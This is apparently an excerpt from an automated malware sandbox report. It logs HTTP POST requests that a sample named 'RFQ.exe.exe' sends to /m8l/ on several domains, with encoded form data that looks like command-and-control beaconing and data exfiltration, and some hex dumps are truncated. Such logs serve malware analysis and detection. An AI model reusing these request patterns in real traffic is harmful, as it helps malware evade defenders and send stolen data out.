          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.teccommunications.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.teccommunications.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teccommunications.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 48 37 6f 39 6b 41 63 4c 37 74 77 6b 30 6a 30 7a 61 64 51 39 28 33 42 47 39 31 43 4f 6e 45 50 58 78 4d 69 4c 37 58 43 78 4d 4f 7e 67 6a 47 58 7a 66 56 4f 34 7e 38 69 2d 47 69 41 5a 34 2d 56 6e 7a 2d 4a 4f 5a 44 4c 67 4d 54 75 6b 67 6d 46 54 7a 74 30 61 6b 71 36 38 48 54 77 51 44 6e 31 45 66 7a 52 42 71 70 7a 5f 7e 50 55 4a 4d 4b 61 6d 34 4b 42 30 4c 6d 44 30 65 4c 69 70 35 74 50 49 33 51 66 6b 54 5f 47 49 6a 41 7a 50 45 56 6b 4e 63 36 44 46 69 44 4c 59 77 41 62 50 51 75 47 4a 56 4c 39 49 57 66 37 4a 59 30 48 30 4b 74 4a 32 44 30 30 79 4b 50 76 47 58 50 49 39 6f 73 69 38 4e 48 6c 32 74 7a 78 49 78 39 65 73 43 50 33 77 66 2d 6a 4b 7a 65 71 71 66 6c 67 30 33 57 42 33 37 62 47 51 69 38 4b 49 4a 30 6a 41 4a 47 78 69 39 71 45 59 71 59 59 33 4b 4c 54 78 57 59 4e 6f 47 78 39 58 69 51 54 36 61 49 59 72 47 2d 4c 71 50 73 37 6b 53 38 6f 70 4e 36 6e 6b 44 63 64 36 51 5a 5a 73 36 4b 4f 73 6b 35 54 33 7a 4c 4f 4f 34 7a 4b 43 65 4d 6c 73 31 58 39 30 7a 36 28 68 4a 70 76 36 50 43 4c 6e 6f 78 6c 66 33 79 68 5f 52 45 59 5f 6b 64 43 47 44 4d 64 57 6d 6e 44 4a 52 77 4c 6b 57 58 61 34 4c 4e 74 5f 28 72 69 44 71 36 70 68 61 44 42 32 68 53 79 46 4e 70 4d 52 38 41 41 58 70 5f 64 6a 58 55 6a 63 55 37 57 67 55 41 29 2e 00 4b 30 67 29 2e 00 00 Data Ascii: tVT=H7o9kAcL7twk0j0zadQ9(3BG91COnEPXxMiL7XCxMO~gjGXzfVO4~8i-GiAZ4-Vnz-JOZDLgMTukgmFTzt0akq68HTwQDn1EfzRBqpz_~PUJMKam4KB0LmD0eLip5tPI3QfkT_GIjAzPEVkNc6DFiDLYwAbPQuGJVL9IWf7JY0H0KtJ2D00yKPvGXPI9osi8NHl2tzxIx9esCP3wf-jKzeqqflg03WB37bGQi8KIJ0jAJGxi9qEYqYY3KLTxWYNoGx9XiQT6aIYrG-LqPs7kS8opN6nkDcd6QZZs6KOsk5T3zLOO4zKCeMls1X90z6(hJpv6PCLnoxlf3yh_REY_kdCGDMdWmnDJRwLkWXa4LNt_(riDq6phaDB2hSyFNpMR8AAXp_djXUjcU7WgUA).K0g).
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.teccommunications.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.teccommunications.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teccommunications.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 48 37 6f 39 6b 44 4d 6c 38 64 6c 69 78 52 63 6b 66 76 38 63 79 47 35 49 28 46 57 43 35 6a 43 6d 34 38 4f 62 37 57 79 31 45 76 76 5f 6d 6d 48 7a 50 67 53 37 6c 73 69 5f 52 79 41 57 70 4f 5a 66 74 65 68 47 5a 43 66 4f 4d 54 6d 6e 31 55 64 53 7a 39 30 4a 6c 4b 6d 51 54 6a 6c 43 44 69 74 74 66 52 39 53 74 70 76 5f 36 5f 4d 4c 41 4c 4b 4c 75 66 74 78 52 79 62 37 59 4b 61 77 35 65 4c 77 33 79 69 42 44 75 71 4b 6b 7a 75 4e 50 30 56 61 4b 4c 4c 30 73 7a 66 56 31 48 4b 53 50 5a 66 4f 59 71 38 72 4b 4d 6a 4b 47 33 33 75 42 4e 35 2d 54 56 42 49 4e 4f 28 53 58 4d 35 49 7a 4f 33 36 4a 41 6c 2d 7e 79 39 79 37 70 4f 75 4f 65 32 31 4f 6f 33 34 31 64 79 56 44 52 77 52 39 6d 74 59 34 59 28 58 6d 74 53 7a 46 68 50 4d 64 44 4e 57 7e 35 6f 75 31 49 70 6e 44 6f 7a 69 59 70 74 67 48 43 52 6c 28 67 53 53 63 49 59 5f 4f 63 69 64 65 34 66 72 54 76 68 6c 61 4e 37 4c 56 59 70 37 58 61 73 2d 6e 59 79 76 6f 6f 4c 72 37 5a 57 36 76 6c 71 33 59 72 4d 53 39 33 39 72 35 63 72 63 4a 70 75 44 50 43 6e 65 70 46 74 66 33 6a 42 6f 53 6c 59 37 31 4e 43 68 50 5f 6c 75 38 41 44 5a 52 77 54 6b 51 6c 44 74 49 63 70 5f 31 64 6d 45 71 59 42 68 61 7a 42 32 71 79 7a 30 4e 6f 52 61 37 57 4d 6c 6e 65 4d 6c 44 7a 47 4b 52 49 54 4c 45 36 6a 35 67 37 72 5a 4e 5a 64 6b 76 5a 32 41 4d 30 4e 4a 31 71 68 77 54 33 73 66 73 73 49 68 77 44 39 33 48 4c 49 47 73 6d 6e 57 47 6c 6e 4e 77 6c 32 4d 4c 4c 57 77 33 57 4b 70 36 64 43 63 66 4c 55 46 6b 74 77 33 63 6b 79 62 68 51 73 6c 35 53 41 75 72 7a 46 37 37 59 39 6a 7e 55 46 72 6e 5f 50 31 55 6f 62 58 31 41 72 34 7a 62 52 4d 38 67 64 30 48 55 72 65 74 69 71 6e 39 50 75 55 76 74 70 77 32 65 4f 4f 38 43 66 69 52 33 49 5f 31 4e 47 77 34 4a 71 65 68 6e 65 51 51 6d 6c 64 50 4a 30 45 6a 69 77 4c 79 33 65 4d 50 53 39 4a 6c 76 77 70 53 6e 4e 50 55 56 4b 35 61 49 54 61 72 65 45 6b 79 4e 74 6a 59 48 64 56 41 44 44 56 73 59 43 39 7e 41 69 37 4a 6d 30 73 36 54 68 33 77 51 64 39 62 56 35 48 45 54 31 58 68 2d 76 4d 49 52 76 57 37 67 54 37 33 63 6b 45 6c 7a 59 6e 63 75 31 47 78 35 79 35 44 77 49 62 4e 58 65 57 53 69 63 4e 52 67 68 36 4f 51 6b 74 32 65 34 49 28 43 77 67 59 79 33 53 58 74 47 47 6d 2d 48 74 69 73 67 59 32 62 62 42 35 30 77 46 41 58 76 47 69 54 6d 70 38 50 74 62 46 30 69 4e 61 39 36 68 39 67 43 6b 6c 6e 47 79 76 61 49 48 46 62 62 69 49 36 69 72 36 6a 59 44 4e 46 4b 63 48 38 56 5f 36 74 70 33 62 42 50 58 77 42 4d 63 48 50 47 77 6b 65 6e 62 79 49 62 6d 4e 4c 66 56 72 4e 7a 55 64 53 39 57 55 39 37 36 4d 48 47 7a 72 71 64 7a 56 6b 53 7a 4c 72 58 51 50 6b 33 6c 58 50 53 78 45 73 35 4a 55 49 49 61 70 42 75 54 58 42 30 77 79 4c 70 30 76 6
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.obsoletelabs.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.obsoletelabs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.obsoletelabs.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 50 67 68 45 47 48 42 31 31 49 59 4e 64 41 66 38 37 74 77 6c 57 59 4b 74 52 66 4e 49 69 4f 45 46 63 51 47 70 71 72 73 6b 45 45 32 55 6e 35 51 71 6b 66 7a 41 74 4a 51 41 74 38 48 4b 4f 50 48 77 35 56 39 55 72 6b 28 49 65 75 6d 55 79 79 5a 34 6c 62 6e 54 34 48 37 42 72 7a 63 4e 53 6f 36 66 70 4a 51 59 63 34 52 57 6e 74 43 49 32 68 4e 33 6c 79 68 68 55 74 6c 5f 44 32 75 4b 51 5f 48 38 51 62 4d 4f 34 59 53 76 50 33 4d 37 4b 37 49 30 44 77 41 36 38 6a 4d 35 51 4f 49 75 65 6e 72 50 4f 65 47 79 52 4a 59 57 4c 71 38 74 37 6e 43 46 72 75 67 44 7e 76 6c 58 34 52 42 4b 70 38 57 67 36 5f 31 39 32 30 75 41 44 50 69 5f 77 79 46 69 71 64 58 7a 43 5f 37 67 62 68 34 66 36 63 69 36 36 6b 37 76 49 69 34 50 43 76 35 68 61 51 55 43 51 53 58 6b 31 42 32 39 5a 67 41 47 4a 6c 74 59 7e 36 57 61 79 37 52 70 51 4f 48 30 6c 43 70 61 66 76 77 52 73 76 6c 75 31 67 74 54 53 35 66 50 45 30 30 41 6e 2d 6f 47 4b 46 4e 30 58 34 37 78 46 34 53 71 78 54 33 34 31 4f 76 34 56 45 56 34 75 57 6d 31 32 4e 52 6d 42 62 73 46 4b 72 65 79 4c 58 54 49 70 5f 76 51 36 66 33 73 6a 68 69 66 61 55 67 51 76 72 32 56 47 30 7a 6b 65 6f 66 32 33 72 44 6a 44 6a 4a 54 58 4b 55 61 73 4c 59 49 48 70 4e 46 77 50 73 75 6e 62 6a 48 57 35 47 30 55 51 29 2e 00 64 6a 58 55 6a 63 55 Data Ascii: tVT=PghEGHB11IYNdAf87twlWYKtRfNIiOEFcQGpqrskEE2Un5QqkfzAtJQAt8HKOPHw5V9Urk(IeumUyyZ4lbnT4H7BrzcNSo6fpJQYc4RWntCI2hN3lyhhUtl_D2uKQ_H8QbMO4YSvP3M7K7I0DwA68jM5QOIuenrPOeGyRJYWLq8t7nCFrugD~vlX4RBKp8Wg6_1920uADPi_wyFiqdXzC_7gbh4f6ci66k7vIi4PCv5haQUCQSXk1B29ZgAGJltY~6Way7RpQOH0lCpafvwRsvlu1gtTS5fPE00An-oGKFN0X47xF4SqxT341Ov4VEV4uWm12NRmBbsFKreyLXTIp_vQ6f3sjhifaUgQvr2VG0zkeof23rDjDjJTXKUasLYIHpNFwPsunbjHW5G0UQ).djXUjcU
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.obsoletelabs.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.obsoletelabs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.obsoletelabs.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 50 67 68 45 47 47 34 45 79 34 55 6d 61 79 33 72 73 71 51 49 4a 6f 69 76 58 76 42 55 7e 74 35 30 43 33 58 73 71 72 63 67 4d 68 72 62 73 35 67 71 69 64 4c 48 35 5a 51 44 38 73 48 56 4b 50 62 49 6a 47 74 4d 72 6c 36 66 65 75 75 62 38 52 42 48 6c 4c 6e 49 34 6e 33 58 36 44 49 61 53 71 7e 32 71 72 38 51 4f 6f 74 57 6a 5a 75 47 72 31 51 70 31 57 4a 2d 64 39 35 2d 42 31 69 44 51 49 28 74 52 34 77 57 28 63 7a 4a 4c 45 51 77 55 72 34 63 48 6e 38 6c 79 54 6f 36 63 76 64 30 52 67 7a 4c 4e 61 54 50 50 62 77 56 49 61 30 6e 33 46 61 33 75 63 4d 32 38 2d 55 75 34 53 78 77 76 4b 33 6d 7e 2d 70 31 30 47 4c 6c 4e 64 4f 35 38 6c 5a 36 75 66 50 67 4f 66 4c 50 45 30 63 45 77 74 7e 76 32 48 43 69 46 67 49 61 52 75 31 39 52 43 64 31 52 77 36 70 39 67 6d 43 42 54 67 56 42 57 31 41 28 5f 48 4c 38 37 51 39 41 2d 48 67 74 67 68 69 62 4a 49 67 70 75 56 41 78 6a 39 43 59 49 7a 4d 4b 52 30 45 6a 76 73 46 49 77 68 77 45 4f 33 6a 57 72 66 6e 67 7a 44 78 68 65 76 6a 41 52 35 76 75 57 6d 58 32 4f 4a 41 54 36 6f 46 4c 37 7e 74 49 30 37 55 34 76 76 4a 32 72 54 69 74 79 4c 61 61 55 34 51 68 36 47 76 42 58 6a 6b 5a 2d 62 31 33 4a 37 6a 42 54 4a 54 44 36 56 57 39 71 38 41 42 34 31 79 77 76 5a 31 7a 76 33 54 57 34 44 57 43 63 52 44 4f 65 50 75 33 63 4d 6f 4c 6c 66 36 36 79 57 43 53 39 7a 67 4e 4c 4d 30 48 32 52 56 31 4c 6e 37 32 73 34 69 4f 74 62 68 42 5f 72 57 34 6c 42 42 52 72 48 43 56 6e 4a 74 42 54 6a 58 7a 47 39 75 54 52 7a 67 6f 6a 64 4d 6c 42 72 2d 42 36 54 6a 5a 6d 44 77 52 39 44 78 4f 4a 53 75 53 51 72 78 38 5f 36 68 70 6f 61 66 4f 75 38 57 43 70 34 33 74 77 6b 45 34 6d 39 56 70 71 37 6f 52 78 6d 64 32 4f 6a 4c 74 6a 49 53 38 5a 28 37 56 41 30 38 32 4d 51 61 59 4f 56 39 54 38 4f 6b 77 52 65 2d 35 35 36 38 30 35 56 77 53 30 55 38 63 6b 37 7a 30 45 38 6a 78 53 67 4c 58 41 35 31 57 32 43 63 74 75 7a 6d 62 73 78 73 39 65 79 66 70 38 65 61 52 52 52 6f 51 6f 76 79 75 45 61 6d 72 79 79 4f 77 57 65 2d 69 35 78 35 4c 5f 65 69 58 6f 69 69 6b 62 66 55 68 2d 42 4a 37 34 41 6e 68 4b 4b 61 6b 4d 6e 69 44 66 4e 70 77 73 7a 4c 69 34 77 67 30 38 30 39 44 65 78 35 6a 43 65 67 32 68 4e 68 53 72 32 45 73 45 70 50 79 67 28 59 4d 2d 79 78 6c 33 28 5a 69 2d 66 5a 5a 35 36 38 6f 4e 54 73 71 65 37 4a 73 69 54 61 78 76 4a 59 39 75 53 32 33 32 57 59 71 75 69 31 61 6d 7a 47 58 5f 66 66 58 76 38 73 4f 4b 43 48 68 4b 4e 50 33 66 46 35 37 65 34 71 6f 4a 34 62 7a 34 38 58 30 33 56 70 67 4c 41 61 72 4a 44 42 54 5f 49 6c 66 4e 7e 50 62 41 64 32 48 38 53 54 47 77 53 30 7e 48 41 75 69 59 32 5f 4f 46 58 4a 67 61 39 76 75 72 50 4e 47 48 67 43 4a 6e 49 6e 53 42 38 34 6a 49 72 76 74 70 46 4b 41 6e 7
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 67 70 4d 76 52 56 6c 6e 31 28 65 31 35 4f 49 42 57 7a 4f 6b 79 61 33 47 4c 6e 41 5a 6c 6a 32 6d 6f 55 2d 4f 32 4a 42 41 33 59 76 55 4c 48 68 62 44 44 67 61 36 6e 4f 65 5f 64 6b 4f 71 61 39 32 39 59 54 48 76 62 6b 71 6f 58 79 42 62 43 68 64 46 34 43 71 4e 7e 6b 78 58 49 48 7e 78 57 73 75 39 79 49 72 78 4c 4e 57 67 68 65 65 6c 68 76 72 7a 45 54 6c 58 74 34 73 2d 36 4a 51 50 52 4b 49 43 75 32 79 67 42 6d 4c 5f 44 31 50 50 54 6d 4c 78 6b 79 6f 75 6b 50 50 65 65 49 36 6e 4b 79 64 4d 34 4b 69 56 34 73 44 66 6e 57 4d 57 30 36 42 72 62 72 7e 71 57 2d 47 56 6e 4c 78 6a 69 67 4b 68 4d 37 6f 57 68 4f 7a 6d 41 42 6e 6c 6e 72 58 45 63 34 67 65 4c 46 68 37 4f 4f 55 41 76 6f 38 65 69 6b 66 66 63 72 50 79 76 69 41 41 42 4f 30 45 34 73 4a 6e 66 65 54 36 72 36 5a 41 5a 36 69 44 49 79 44 54 64 53 6d 71 39 4d 70 72 6d 37 39 49 6d 61 44 66 4a 54 4a 46 4b 59 63 71 4c 56 72 33 54 70 73 54 45 2d 74 59 38 43 32 68 55 39 76 4e 44 36 6b 4e 42 6d 77 4f 52 6c 6c 79 7e 74 79 35 74 77 58 55 76 44 4b 6b 57 6d 39 59 44 6b 72 44 52 32 4c 72 6c 30 41 69 6b 36 39 4a 50 31 34 65 4a 32 75 63 6f 45 6f 4f 68 6f 4a 30 66 41 62 71 76 37 30 36 5a 5f 77 54 4f 36 76 70 73 36 6d 6b 63 6c 4b 70 71 74 51 4e 69 5a 75 77 29 2e 00 62 6a 48 57 35 47 30 Data Ascii: tVT=x0zD6gpMvRVln1(e15OIBWzOkya3GLnAZlj2moU-O2JBA3YvULHhbDDga6nOe_dkOqa929YTHvbkqoXyBbChdF4CqN~kxXIH~xWsu9yIrxLNWgheelhvrzETlXt4s-6JQPRKICu2ygBmL_D1PPTmLxkyoukPPeeI6nKydM4KiV4sDfnWMW06Brbr~qW-GVnLxjigKhM7oWhOzmABnlnrXEc4geLFh7OOUAvo8eikffcrPyviAABO0E4sJnfeT6r6ZAZ6iDIyDTdSmq9Mprm79ImaDfJTJFKYcqLVr3TpsTE-tY8C2hU9vND6kNBmwORlly~ty5twXUvDKkWm9YDkrDR2Lrl0Aik69JP14eJ2ucoEoOhoJ0fAbqv706Z_wTO6vps6mkclKpqtQNiZuw).bjHW5G0
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.artiyonq.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.artiyonq.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.artiyonq.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 78 30 7a 44 36 6b 31 79 70 77 45 35 6a 41 54 57 6b 36 69 70 4d 6d 72 4d 69 53 65 7a 50 38 4c 36 51 56 4f 70 6d 70 45 36 45 6b 78 70 4b 33 45 76 53 4a 28 69 57 44 44 68 63 36 6e 4e 61 5f 5a 63 48 59 71 31 32 38 64 49 48 76 44 72 6a 4f 72 33 47 4c 43 4d 62 6b 46 78 6a 70 57 5f 78 53 49 59 7e 55 48 5f 6c 74 7e 49 6d 68 54 50 54 42 77 4d 5a 68 78 77 6d 69 6f 61 32 47 55 38 72 49 7a 30 52 70 5a 6f 5a 47 6d 34 33 57 41 6f 4f 38 72 64 59 6f 33 35 42 42 77 35 32 35 73 51 53 74 37 44 37 69 7e 51 42 35 4d 4e 7e 31 78 38 49 34 61 6c 4b 69 73 74 48 34 44 56 7e 73 57 49 63 54 50 67 31 68 47 6f 47 77 78 75 6a 48 31 4d 28 30 6f 4a 77 51 54 61 52 46 4e 69 38 75 37 56 32 62 54 55 59 6d 71 31 68 72 43 66 64 4b 73 64 48 69 66 57 4e 33 5a 57 39 6e 67 54 4f 67 69 63 64 4c 4c 69 61 43 31 4d 28 7a 4a 55 46 54 64 6b 74 49 30 73 34 35 4b 77 7a 35 57 34 48 59 74 4b 4f 52 28 71 66 6f 28 5a 6c 7a 7a 71 71 6a 73 69 34 5f 77 2d 38 69 34 79 28 66 66 5a 73 74 42 31 72 38 35 73 6c 79 7e 4c 79 34 74 65 57 6b 4c 44 4c 77 43 50 39 37 37 77 28 7a 52 5f 4a 62 31 79 5a 69 6f 55 39 4e 72 31 35 73 52 63 76 76 49 45 69 5f 78 72 4a 57 6e 41 64 61 76 37 39 61 59 39 31 7a 37 72 74 4f 38 67 74 46 4e 79 44 73 57 2d 52 64 44 7a 7e 77 64 61 43 5f 7e 79 37 43 4e 51 59 41 53 56 4b 50 7e 4f 32 48 48 6b 51 67 65 61 6c 2d 32 61 72 70 35 75 44 39 35 4a 39 52 53 70 68 56 4f 4a 54 52 4a 52 66 43 64 58 39 66 32 78 5a 35 45 6a 32 65 43 74 59 41 6d 39 50 67 48 4a 4c 71 46 54 39 4e 6e 38 55 4a 6c 67 6a 37 67 68 7e 34 67 52 75 75 42 45 46 6b 33 63 6e 66 51 34 38 31 35 56 49 78 54 44 37 4f 55 52 46 6a 65 46 7a 5a 72 6b 7a 42 75 5f 38 44 42 42 71 61 55 58 38 42 49 70 51 73 73 58 51 62 51 6b 49 31 59 69 37 43 57 42 67 77 7e 72 44 72 62 5f 35 62 58 5f 38 56 52 51 4e 38 42 64 28 58 4f 66 43 46 61 61 35 66 58 77 4e 4a 37 65 6a 65 45 47 78 46 36 76 74 74 68 59 48 39 7a 59 28 73 61 68 59 41 73 78 4d 36 6b 33 4b 70 69 44 6c 71 4b 46 71 4f 72 55 77 4a 31 62 7e 6c 62 4d 69 67 74 6f 6b 33 55 50 34 34 45 70 33 6f 69 47 57 78 55 45 7e 69 30 44 54 58 53 31 30 65 51 43 42 5f 75 57 55 45 48 6f 36 5f 77 7a 63 77 77 6e 56 51 73 68 55 38 37 6d 61 41 72 5a 5a 47 54 66 73 4e 6a 70 4f 77 72 7a 42 6e 69 72 51 69 7e 6a 64 79 4a 79 53 6f 33 36 37 47 70 63 49 6d 72 31 56 50 38 72 75 48 30 32 76 6c 30 67 6f 62 47 42 62 34 64 4e 31 48 51 74 43 4a 76 70 54 58 61 61 68 79 36 50 78 64 68 33 77 6c 78 71 61 41 50 77 75 65 37 7a 72 4f 75 47 28 57 69 4f 6b 44 58 6d 56 2d 6a 36 41 4d 63 6c 33 6e 31 33 30 76 63 58 47 6d 6e 67 71 67 62 42 64 6e 54 70 77 65 6e 6e 42 50 70 50 6e 63 57 51 51 37 56 42 46 56 47 4e 32 75 4d 35 7a 52 75 66 55 6c 6
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 59 58 57 43 57 4f 46 62 6a 52 64 7e 74 30 39 57 4b 4f 45 51 33 69 58 64 74 6c 33 54 78 4c 35 54 5f 68 62 30 4b 4d 6a 50 74 35 59 50 6d 66 51 7a 59 4f 50 6a 58 39 6b 36 32 63 7a 44 42 41 6e 61 58 75 5f 41 6a 66 55 67 7a 42 5a 52 73 47 71 30 52 6f 30 63 47 4f 4c 4e 64 45 41 6f 74 33 34 61 33 49 2d 49 54 50 52 4f 74 4b 4a 6d 39 6b 30 6a 66 32 38 4d 71 51 51 70 54 50 74 79 50 7a 75 36 4f 6d 7a 6b 6c 6c 50 75 37 4a 38 54 6b 33 76 56 37 70 37 62 70 68 4c 67 48 68 65 51 4f 45 42 7a 54 38 67 57 4d 67 76 4e 41 72 57 28 72 31 34 47 37 42 52 54 57 6a 52 5a 69 47 51 6b 39 6e 48 45 59 7a 59 6a 64 66 56 42 43 7a 73 6a 61 72 33 66 74 65 30 6e 59 61 47 6c 65 4e 65 62 4c 55 38 79 58 69 39 77 43 38 76 73 67 69 51 78 66 5a 41 4a 48 61 66 45 36 52 2d 50 52 53 72 6f 48 4a 41 47 39 75 52 39 4e 5a 55 75 44 33 53 34 33 54 68 37 55 58 5a 74 56 34 6e 42 49 72 79 35 32 46 49 55 62 7e 38 46 73 4f 55 64 59 57 78 7a 2d 53 30 4a 34 73 49 6a 66 50 61 47 72 41 74 4a 47 62 58 73 79 4e 6d 65 53 73 45 74 38 68 5f 34 4b 4d 4f 34 61 78 63 54 33 45 36 43 74 6d 32 32 35 32 32 71 78 7a 38 71 44 58 76 50 45 69 39 4a 6a 30 79 6d 52 79 61 42 38 6e 70 78 31 33 73 50 54 39 6d 38 35 4f 53 76 75 48 77 62 69 6e 6e 65 77 29 2e 00 51 4e 69 5a 75 77 29 Data Ascii: tVT=V-LA0YXWCWOFbjRd~t09WKOEQ3iXdtl3TxL5T_hb0KMjPt5YPmfQzYOPjX9k62czDBAnaXu_AjfUgzBZRsGq0Ro0cGOLNdEAot34a3I-ITPROtKJm9k0jf28MqQQpTPtyPzu6OmzkllPu7J8Tk3vV7p7bphLgHheQOEBzT8gWMgvNArW(r14G7BRTWjRZiGQk9nHEYzYjdfVBCzsjar3fte0nYaGleNebLU8yXi9wC8vsgiQxfZAJHafE6R-PRSroHJAG9uR9NZUuD3S43Th7UXZtV4nBIry52FIUb~8FsOUdYWxz-S0J4sIjfPaGrAtJGbXsyNmeSsEt8h_4KMO4axcT3E6Ctm22522qxz8qDXvPEi9Jj0ymRyaB8npx13sPT9m85OSvuHwbinnew).QNiZuw)
          Source: global trafficHTTP traffic detected: POST /m8l/ HTTP/1.1Host: www.tgers.comConnection: closeContent-Length: 142745Cache-Control: no-cacheOrigin: http://www.tgers.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tgers.com/m8l/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 74 56 54 3d 56 2d 4c 41 30 62 48 61 44 6e 66 64 66 51 34 71 32 2d 5a 76 66 36 47 4b 53 47 57 51 44 4e 64 4a 65 47 61 6b 54 5f 52 66 68 5f 51 58 63 65 78 59 4a 6b 33 58 37 59 4f 49 6c 58 39 6c 7e 32 41 4c 4d 41 6b 76 61 56 43 52 41 6c 48 4c 79 77 70 57 52 38 47 39 30 77 55 45 61 43 6d 51 4e 62 4e 51 72 50 62 65 66 33 30 2d 47 48 62 54 42 70 50 56 6a 5f 41 72 74 50 36 35 4b 75 55 4a 70 68 37 5f 77 76 71 42 72 4c 47 78 31 44 4e 59 69 62 34 72 58 33 58 6b 4c 37 74 32 43 61 63 50 71 41 51 58 44 36 51 6e 71 78 55 6e 55 38 35 73 49 43 7a 6b 76 4a 5a 42 56 36 52 46 54 56 54 72 55 78 43 37 31 73 37 66 47 70 76 2d 6f 49 28 58 66 46 76 4f 6f 35 4f 46 5a 74 4f 62 36 6f 71 6a 32 65 68 48 61 4a 38 57 38 57 36 57 79 33 55 64 6e 77 54 77 77 35 55 44 4c 48 71 67 63 74 46 74 46 6c 75 6a 72 42 52 36 43 64 75 71 37 4e 5a 69 36 32 37 44 39 54 33 55 34 45 6d 34 6e 30 78 7a 4e 38 62 39 38 30 42 36 65 61 71 35 47 64 6d 49 56 4c 75 6a 35 5f 47 5f 49 62 78 6a 36 76 4f 62 4d 4e 39 41 4a 47 62 31 73 33 31 59 65 6a 34 45 73 6f 30 6b 34 6f 6b 38 76 4b 78 42 51 6d 30 34 4a 2d 43 6d 32 35 4f 32 72 45 50 47 72 77 48 76 59 42 75 2d 4a 43 30 79 6e 42 79 61 49 63 6d 78 32 31 75 54 4e 57 70 5f 34 62 72 48 73 72 36 58 4e 47 79 62 47 6e 4a 55 7e 76 32 35 47 59 4b 72 59 51 71 57 58 5f 36 4d 72 7a 41 4a 28 4b 6e 41 54 69 65 76 67 5f 6c 4c 42 63 4f 58 47 31 4d 43 62 39 42 58 61 67 47 55 48 35 35 79 61 4a 6f 34 38 6b 34 71 38 70 6d 67 43 58 28 73 46 57 63 5f 34 71 61 32 38 71 53 37 62 2d 6c 35 28 57 41 68 72 66 4d 2d 4b 65 67 4c 74 64 6d 70 76 74 56 4d 43 46 7e 75 68 78 6b 5f 6a 68 50 71 34 69 75 51 62 4a 66 36 7e 49 31 64 70 6c 61 67 6d 56 52 53 46 39 59 59 6c 39 31 78 61 43 52 62 76 70 53 61 7a 72 74 30 37 5a 66 54 50 42 32 62 72 70 46 6f 39 6e 54 56 54 33 72 6f 6e 45 63 38 44 76 36 41 7e 73 78 4b 55 76 79 43 61 77 6f 34 4c 42 63 73 6b 6b 6a 37 68 58 71 31 57 33 4c 6c 72 49 6e 35 71 58 71 51 50 69 79 4f 73 52 64 2d 48 67 54 6c 37 5a 75 41 54 48 5a 31 52 61 68 6c 52 77 4b 41 59 72 68 76 7e 66 6e 49 37 64 79 48 79 37 4f 50 34 50 4f 67 30 43 38 43 56 37 65 6e 5a 6b 6a 30 39 37 33 63 6a 41 44 77 49 79 35 45 4c 6c 61 39 28 47 76 6c 30 4e 32 6f 72 43 7e 52 59 7a 4e 69 47 6c 72 33 38 43 54 47 78 6d 78 53 32 2d 76 64 64 51 78 48 73 7a 79 53 7a 72 51 6b 55 4a 7a 36 58 44 35 67 7a 4e 45 6e 4f 2d 44 4b 62 4e 68 66 30 70 58 57 75 4e 51 6f 49 38 70 33 59 76 67 65 76 74 78 79 38 68 76 57 36 74 65 6d 4a 52 67 54 47 43 51 68 6b 4e 48 4f 70 6d 4e 45 49 61 73 58 66 4f 68 77 7a 63 4a 6e 68 67 54 32 6a 73 6a 35 5a 5a 6c 39 61 48 31 5a 74 47 6d 36 61 31 46 58 35 4f 6f 61 71 30 31 6f 33 2d 35 76 71 48 76 6f 35 72 69 65 64 5
          Source: C:\Users\user\Desktop\RFQ.exe.exeCode function: 6_2_00E44EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,6_2_00E44EB5
